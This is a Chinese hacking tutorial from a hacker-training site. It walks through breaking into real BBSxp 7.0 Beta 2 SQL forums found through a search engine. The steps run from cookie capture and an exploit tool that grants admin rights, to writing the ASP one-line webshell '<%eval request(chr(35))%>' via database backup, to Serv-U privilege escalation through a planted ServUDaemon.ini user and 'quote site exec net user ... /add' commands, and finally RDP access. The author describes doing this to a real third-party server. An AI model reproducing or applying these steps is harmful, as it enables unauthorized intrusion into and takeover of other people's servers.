黑客动画吧 http://www.hack58.com

专业的黑客动画教程网站

免费学习黑客黑客技术

成为黑客不是梦。
打造国内最大的黑客动画网站

注意：所有教程全部对外免费开放

-----------------------------------------------------------------------------------
大家好！
我是小闷！QQ83097996邮箱zysqb@163.com
做个小动画只想要一个黑客吧论坛的邀请码，请管理员成全！

                       bbsxp7利用工具获webshell到拿服务器

bbsxp7利用工具出来几天了，QQ上有朋友问该工具怎么用，以及怎么提权拿下服务器，在此做一个小动画演示一下具体的过程，没有什么技术含量，仅供菜鸟学习，老鸟略过。不说废话，也不打广告，鄙视打广告的，直接开始吧！GO

工具     下载地址
1、bbsxp7利用工具   http://www.hack58.com/Soft/html/15/29/2007/200701259554.htm
2、WinSock Expert v0.6 beta1  http://www.hack58.com/Soft/html/15/30/2005/200507301599.htm
3、lake2的eval最小马发送端  http://www.hack58.com/Soft/html/15/29/2005/200510292851.htm
4、自己的asp木马
5、提权马    压缩包里有

注意：bbsxp7利用工具利用的漏洞只影响BBSxp 7.0 Beta 2 sql的版本。

1、在baidu搜索关键字Powered by BBSXP 7.00 Beta 2 SQL，我们随便点一个，这里我找准备好的，方便等下做提权拿下服务器。

2、注册一个用户名，节约时间，我已经注册好了xm。

3、登陆后发一个帖子，然后点击编辑该帖子，现在我们用到工具WinSock Expert进行抓包，获取Cookies。

4、打开bbsxp7利用工具，在目标主机那里填入编辑该帖子的地址，将获取的Cookies填入Cookie一栏，将你的用户名填入指定用户名，具体请看以下操作：

   首先修改指定用户为管理员，刷新一下网页，已经是管理员了，点击“管理”进入后台。

   然后改后台密码为指定用户密码，用你的用户密码登陆后台成功。此时，我们已经成功拿到网站后台。下面做的就是拿webshell和提权。

   对于sql拿webshell的方法还是选择差异备份和log备份好。
   我们选择差异备份获得webshell，这里关键是路径怎么办？很多人想到用暴网站物理路径的方法，其实何必费那么大的劲？网站后台不是现成的有吗？在其他功能那里点“主机环境变量”，看到没？本文件请求的物理路径 E:\user\bbsxp\Admin_other.asp 呵呵。
    回到bbsxp7利用工具，在路径那里填上E:\user\bbsxp\xiaomen.asp，文件名字自己取。代码那里默认是<%evalrequest(chr(35))%>，chr(35)就是“#”的ANSI字符代码，我们这里就有用默认的，一会用lake2的eval最小马发送端连接就是了。好，成功了。

   用lake2的eval最小马发送端连接，上传你的大马，我这里选择的是海阳的。好慢啊这样成功拿下了webshell！权利很大哦，能打开所有盘符！

   开始提权了，这里我们通过Serv-U提权，先看服务器装了Serv-U没？
   转到C:\Documents and Settings\All Users\「开始」菜单\程序\，有Serv-U，我们就通过它提权，提权能否成功还要看Serv-U的默认本地管理帐号和密码以及Serv-U的端口被修改没有，我们也可以通过在命令行那里输入netstat -an看有没有开43958端口(Serv-U默认端口)。

   传上我们的提权木马，用默认的语句添加用户，我们在命令行那里用net user成功没？成功了，在看看什么权限。Administrators
如果这种方法没有成功，这种方法不行，我们换种方法：

   修改ServUDaemon.ini，加个用户xiaomen上去，密码为xm，具体看操作

先找ServUDaemon.ini在哪里，到C:\Documents and Settings\All Users\「开始」菜单\程序\把Serv-U文件下载下来，本地看属性。

ReloadSettings=True这句话放在[GLOBAL]部分，才能让我们的修改立即起效

User8=xm|1|0 加个用户 我有已经加好了

[USER=xm|1]
Password=xmC493Fe01749B3ADD91214AF329C98761
HomeDir=c:\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=e:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYvalues=

将上面的复制到相应位置
   这个用户具有最高权限，然后我们就可以本地ftp上去 quote site exec xxx 来提升权限
   在本地cmd上进行ftp命令
230 User logged in, proceed.
用户名xm密码xm

quote site exec net user 1234 1234 /add  增加系统用户1234
quote site exec net localgroup administrators 1234 /add  将1234设置为管理员
好了，我们去看看增加好没？
好了，增加成功。
通过以上两种方法我们已经增加了2个管理员了123 1234，呵呵

   接下来我们通过3389连接服务器，先看看开了3389没有？点击“服务器相关数据”，看到了 当前终端服务端口: 21218，已经开了，只是端口改成了21218，我们就不用给它开了，直接通过3389连接器连接就是了。

刚才S-Recorder出了问题，掉了，我们重新来哈

通过3389连接器连接
超过最大连接数，我们来注销其他的连接，看操作
再试试再来
这次好了，呵呵，等下就好，第一次登陆很慢的哦

   好了，连接成功了，接下来的事情就自己做了哈！

教程写的很多，比较详细，主要是照顾菜鸟，不知道你们能否看完，老鸟也不要朝我仍臭鸡蛋哈！
做这个动画有个目的就是想要一个黑客吧论坛的邀请码，请管理员成全！

这个服务器大家就不要搞了。我已经通过管理员他们的服务器不安全了。